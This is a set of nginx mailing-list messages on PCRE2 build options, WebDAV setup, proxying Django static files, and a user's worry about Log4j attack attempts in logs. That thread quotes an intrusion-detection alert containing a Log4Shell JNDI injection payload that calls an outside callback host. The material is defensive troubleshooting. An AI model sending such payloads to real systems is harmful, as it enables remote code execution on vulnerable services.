Note though that the original PCRE library is not used as long as PCRE2 is available. That is, the only potential difference such an option might introduce is what happens if PCRE2 is not available: either nginx configure will fail, or fallback to using the original PCRE library. -- Maxim Dounin http://mdounin.ru/ From mauro.tridici at cmcc.it Thu Dec 30 08:24:59 2021 From: mauro.tridici at cmcc.it (Mauro Tridici) Date: Thu, 30 Dec 2021 09:24:59 +0100 Subject: Help request about Log4j attack attempts and NGINX logs meaning In-Reply-To: <04357cfc-3b08-62c6-5ed1-3365f99e6697@nginx.com> References: <7639E066-0367-4B2B-A15B-A7AB69E85FE0@cmcc.it> <04357cfc-3b08-62c6-5ed1-3365f99e6697@nginx.com> Message-ID: <2153E46F-CEA8-44FA-9980-35357D311AA3@cmcc.it> Hello Maxim, Thank you for your reply. This is the information that I need :) Mauro > On 30 Dec 2021, at 08:20, Maxim Konovalov wrote: > > Mauro, > > Unless you use somewhere in your stack log4j vulnerable software (nginx is not) I don't see anything significant to worry about. > > Maxim > > On 29.12.2021 21:34, Mauro Tridici wrote: >> Helo Maxim, >> thank you very much for the explanation. >> In your opinion, is this the case to ?fix? this behaviour (but I don?t know how, I?m a newbie, sorry) or I should simply ignore it? >> Many thanks again, >> Mauro >>> On 29 Dec 2021, at 19:29, Maxim Dounin wrote: >>> >>> Hello! >>> >>> On Wed, Dec 29, 2021 at 03:55:35PM +0100, Mauro Tridici wrote: >>> >>>> I have an old instance of NGINX (v.1.10.1) running as proxy >>>> server on a dedicated hardware platform. >>>> Since the proxy service is reachable from internet, it is >>>> constantly exposed to cyber attacks. >>>> In my particular case, it is attacked by a lot of Log4j attack >>>> attempts from several malicious IPs. >>>> >>>> At this moment, an host intrusion detection system (HIDS) is >>>> running and is protecting the NGINX server: it seems it is >>>> blocking every malicious attack attempts. >>>> Anyway, during the last attack mail notification sent by the >>>> HIDS, I noticed that the NGINX server response was ?HTTP/1.1 >>>> 200? and I?m very worried about it. >>>> Log4j and Java packages are NOT installed on the NGINX server >>>> and all the servers behind the proxy are not using Log4j. >>>> >>>> Could you please help me to understand the reason why the NGINX >>>> server answer was ?HTTP/1.1 200?!? >>>> >>>> You can see below the mail notification I received: >>>> >>>> >>>> Attack Notification. >>>> 2021 Dec 28 20:45:59 >>>> >>>> Received From: ?hidden_NGINX_server_IP? >>>>> /var/log/nginx/access.log >>>> Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt >>>> detected." >>>> Src IP: 166.137.252.110 >>>> Portion of the log(s): >>>> >>>> 166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET >>>> /?sulgz=${jndi:ldap://?hidden_NGINX_server_IP >>>> ".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a >>>> } >>>> HTTP/1.1" 200 3700 "-" "curl/7.64.0" ?-" >>> >>> As you can see from the log line, the request is to "/" with some >>> additional request arguments ("?sulgz=..."). As unknown request >>> arguments are usually ignored, it is no surprise that such a >>> request results in 200. 
>>> >>> -- >>> Maxim Dounin >>> http://mdounin.ru/ >>> _______________________________________________ >>> nginx mailing list >>> nginx at nginx.org >>> http://mailman.nginx.org/mailman/listinfo/nginx >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx > > > -- > Maxim Konovalov From lists at lazygranch.com Thu Dec 30 09:20:27 2021 From: lists at lazygranch.com (lists) Date: Thu, 30 Dec 2021 01:20:27 -0800 Subject: Help request about Log4j attack attempts and NGINX logs meaning In-Reply-To: <04357cfc-3b08-62c6-5ed1-3365f99e6697@nginx.com> Message-ID: <73fk12n5uj8c2f3p70r12qqi.1640856027431@lazygranch.com> This is the list of effected programs. https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md ? Original Message ? From: maxim at nginx.com Sent: December 29, 2021 11:21 PM To: mauro.tridici at cmcc.it Reply-to: nginx at nginx.org Cc: nginx at nginx.org Subject: Re: Help request about Log4j attack attempts and NGINX logs meaning Mauro, Unless you use somewhere in your stack log4j vulnerable software (nginx is not) I don't see anything significant to worry about. Maxim On 29.12.2021 21:34, Mauro Tridici wrote: > Helo Maxim, > > thank you very much for the explanation. > In your opinion, is this the case to ?fix? this behaviour (but I don?t know how, I?m a newbie, sorry)? or I should simply ignore it? > > Many thanks again, > Mauro > >> On 29 Dec 2021, at 19:29, Maxim Dounin wrote: >> >> Hello! >> >> On Wed, Dec 29, 2021 at 03:55:35PM +0100, Mauro Tridici wrote: >> >>> I have an old instance of NGINX (v.1.10.1) running as proxy >>> server on a dedicated hardware platform. >>> Since the proxy service is reachable from internet, it is >>> constantly exposed to cyber attacks. >>> In my particular case, it is attacked by a lot of Log4j attack >>> attempts from several malicious IPs. >>> >>> At this moment, an host intrusion detection system (HIDS) is >>> running and is protecting the NGINX server: it seems it is >>> blocking every malicious attack attempts. >>> Anyway, during the last attack mail notification sent by the >>> HIDS, I noticed that the NGINX server response was ?HTTP/1.1 >>> 200? and I?m very worried about it. >>> Log4j and Java packages are NOT installed on the NGINX server >>> and all the servers behind the proxy are not using Log4j. >>> >>> Could you please help me to understand the reason why the NGINX >>> server answer was ?HTTP/1.1 200?!? >>> >>> You can see below the mail notification I received: >>> >>> >>> Attack Notification. >>> 2021 Dec 28 20:45:59 >>> >>> Received From: ?hidden_NGINX_server_IP? >>>> /var/log/nginx/access.log >>> Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt >>> detected." >>> Src IP: 166.137.252.110 >>> Portion of the log(s): >>> >>> 166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET >>> /?sulgz=${jndi:ldap://?hidden_NGINX_server_IP >>> ".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a >>> } >>> HTTP/1.1" 200 3700 "-" "curl/7.64.0" ?-" >> >> As you can see from the log line, the request is to "/" with some >> additional request arguments ("?sulgz=...").? As unknown request >> arguments are usually ignored, it is no surprise that such a >> request results in 200. 
>> >> -- >> Maxim Dounin >> http://mdounin.ru/ >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx -- Maxim Konovalov _______________________________________________ nginx mailing list nginx at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx From nginx-forum at forum.nginx.org Fri Dec 31 05:49:38 2021 From: nginx-forum at forum.nginx.org (George) Date: Fri, 31 Dec 2021 00:49:38 -0500 Subject: nginx-1.21.5 In-Reply-To: References: Message-ID: Maxim Dounin Wrote: ------------------------------------------------------- > Hello! > > On Wed, Dec 29, 2021 at 11:30:04PM -0500, George wrote: > > > Thanks for PCRE2 support! > > > > From what I read Nginx 1.21.5 will default to PCRE2 if found or > fallback to > > PCRE if not > > > > You can disable PCRE2 default by passing --without-pcre2 flag - > which works > > fine and > > > > ldd $(which nginx) > > > > shows > > > > libpcre.so.1 => /usr/local/nginx-dep/lib/libpcre.so.1 > (0x00007f86c7445000) > > > > But is the same true, if you set --without-pcre flag with PCRE2 > library > > installed and detected? As that seems to end up with nginx failing > to > > configure > > > > ./configure: error: the HTTP rewrite module requires the PCRE > library. > > You can either disable the module by using > --without-http_rewrite_module > > option or you have to enable the PCRE support. > > > > Why is it looking for PCRE when PCRE2 is available? > > The "--without-pcre" configure option completely disables usage of > all versions of the PCRE library, both the original PCRE library > and PCRE2. > > Currently there is not option to disable the original PCRE library > while still using PCRE2. Note though that the original PCRE > library is not used as long as PCRE2 is available. That is, the > only potential difference such an option might introduce is what > happens if PCRE2 is not available: either nginx configure will > fail, or fallback to using the original PCRE library. > > -- > Maxim Dounin > http://mdounin.ru/ > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx Thanks Maxim for the clarification :) So far Nginx 1.21.5 with PCRE2 works fine from my tests with exception of Nginx Lua and ModSecurity Nginx modules being incompatible right now :) Posted at Nginx Forum: https://forum.nginx.org/read.php?2,293170,293214#msg-293214 From nginx-forum at forum.nginx.org Fri Dec 31 11:59:46 2021 From: nginx-forum at forum.nginx.org (BonVonKnobloch) Date: Fri, 31 Dec 2021 06:59:46 -0500 Subject: Setting up a webDAV server Message-ID: Hi, I am new to nginx and am trying to get a simple webDAV server running. I can use GET to read files, but PUT fails. Using opensuse 15.3. '# nginx -V nginx version: nginx/1.20.2 built by gcc 7.5.0 (SUSE Linux) configure arguments: --with-http_dav_module' nginx.conf is as supplied with the following added in 'server': location /html/calendar { root html/calendar; dav_methods PUT DELETE MKCOL COPY MOVE; dav_access group:rw all:r; } and the user changed to 'nginx' After an unsuccessful PUT, wireshark shows: 'No. Time Source Destination Protocol Length Info 17 5.918827416 172.21.42.42 172.21.42.124 HTTP 3133 PUT /calendar/Geburtstage.ics HTTP/1.1 (text/calendar) No. 
Time Source Destination Protocol Length Info 19 5.918956256 172.21.42.124 172.21.42.42 HTTP 380 HTTP/1.1 405 Not Allowed (text/html) It seems a permissions problem, but I don't know where. Linux permissions: The calendar directory is root:nginx 777 and the calendar files are root:nginx 666 can anyone point me to a starting point? Many thanks, Robert von Knobloch. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,293215,293215#msg-293215 From mdounin at mdounin.ru Fri Dec 31 14:48:41 2021 From: mdounin at mdounin.ru (Maxim Dounin) Date: Fri, 31 Dec 2021 17:48:41 +0300 Subject: Setting up a webDAV server In-Reply-To: References: Message-ID: Hello! On Fri, Dec 31, 2021 at 06:59:46AM -0500, BonVonKnobloch wrote: > I am new to nginx and am trying to get a simple webDAV server running. > I can use GET to read files, but PUT fails. > Using opensuse 15.3. [...] > nginx.conf is as supplied with the following added in 'server': > > location /html/calendar { > root html/calendar; > dav_methods PUT DELETE MKCOL COPY MOVE; > dav_access group:rw all:r; > > } > and the user changed to 'nginx' > > After an unsuccessful PUT, wireshark shows: > 'No. Time Source Destination Protocol Length Info > 17 5.918827416 172.21.42.42 172.21.42.124 HTTP 3133 PUT > /calendar/Geburtstage.ics HTTP/1.1 (text/calendar) You've configured DAV methods for "/html/calendar", but try to use it in "/calendar/...". -- Maxim Dounin http://mdounin.ru/ From nginx-forum at forum.nginx.org Fri Dec 31 22:45:07 2021 From: nginx-forum at forum.nginx.org (ningja) Date: Fri, 31 Dec 2021 17:45:07 -0500 Subject: django app static files on the different server not get loaded Message-ID: I have two server test1.com and test2.com. test1 is internet public face server. Test2 is intranet only server. Both servers have nginx docker running. Test1 run a Django app1 which has static files under /app/public/static. App1 can load the static files and run correctly from URL https://test1.com/app1. Test2 has a Django app2 which has static files under /app/public/static on server test2. From URL https://test2.com/app2. Every thing works include static files. The issue is I need config nginx1 to allow people to access app2 from internet.(public) With the configuration nginx1 blow I can load the app2 but not the app2 static files. The error is : "GET /static/img/logo-2.jpg HTTP/1.1", host: "test1.com", referrer: https://test1.com/app2/ . The nginx is looking for app2 static file under test1 which obviously ?file not found?. How can config nginx1 to looking for app2 static file under test2.com https://test2.com/app2/? 
user nginx;
worker_processes 1;
error_log /var/log/nginx/error.log warn;
pid /var/run/nginx.pid;

events {
    worker_connections 1024;
}

http {
    include /etc/nginx/mime.types;
    default_type application/octet-stream;
    client_max_body_size 50m;
    log_format main '$remote_addr - $remote_user [$time_local] "$request" '
                    '$status $body_bytes_sent "$http_referer" '
                    '"$http_user_agent" "$http_x_forwarded_for"';
    access_log /var/log/nginx/access.log main;
    error_log /var/log/nginx/error.log;
    sendfile on;
    keepalive_timeout 65;

    map $http_upgrade $connection_upgrade {
        default upgrade;
        '' close;
    }

    upstream app {
        server django:5000;
    }

    server {
        listen 443 ssl;
        server_name test1.com;
        charset utf-8;
        root /app/public;

        # static files
        location / {
            try_files $uri @proxy_to_app ;
        }

        # prevent XSS, clickjacking, never cache
        add_header "X-Frame-Options" "SAMEORIGIN";
        add_header "X-Content-Type-Options" "nosniff";
        add_header "X-XSS-Protection" "1; mode=block";
        add_header "Pragma" "no-Cache";
        add_header "Cache-Control" "no-Store,no-Cache";

        # app1 static
        location /static/ {
            expires 1d;
            access_log off;
            add_header "Cache-Control" "public";
            add_header "Pragma" "public";
        }

        #app2
        location /app2/ {
            proxy_pass https://test2.com:444;
            proxy_set_header Upgrade $http_upgrade;
            proxy_set_header Connection $connection_upgrade;
            proxy_redirect off;
        }

        # django
        location @proxy_to_app {
            proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
            proxy_set_header X-Forwarded-Proto $scheme;
            proxy_set_header Host $http_host;
            proxy_redirect off;
            proxy_pass http://app;
        }
    } //end of test1 server

    #test2 server
    server{
        listen 444;
        server_name https://test2.com;
        root /app/public;

        # static files
        location / {
            try_files $uri @proxy_to_app ;
        }

        # except anything in static
        location /static/ {
            expires 1d;
            access_log off;
            add_header "Cache-Control" "public";
            add_header "Pragma" "public";
        }
    }#end of test2

    # redirect http to https
    server {
        listen 80;
        server_name test1.com;
        return 301 https://test1.com$request_uri;
    }

    # only valid HTTP_HOST header should be used
    server {
        listen 80 default_server;
        return 403;
    }
}

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,293219,293219#msg-293219
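One possible direction for the app2 static files, sketched only as an illustration (the /app2-static/ prefix and the STATIC_URL value below are invented for this example, not a tested answer): give app2's assets their own prefix on test1 and proxy that prefix to test2, so it no longer collides with app1's /static/ location.

    # on test1: app2's static files get their own prefix and are proxied
    # to test2; /app2-static/img/logo-2.jpg is requested from test2 as
    # /static/img/logo-2.jpg because proxy_pass carries a URI part here
    location /app2-static/ {
        proxy_pass https://test2.com:444/static/;
        proxy_redirect off;
    }

For this to work, app2 itself has to publish its assets under that prefix, for example STATIC_URL = '/app2-static/' in its Django settings, so that its pages request /app2-static/... instead of /static/....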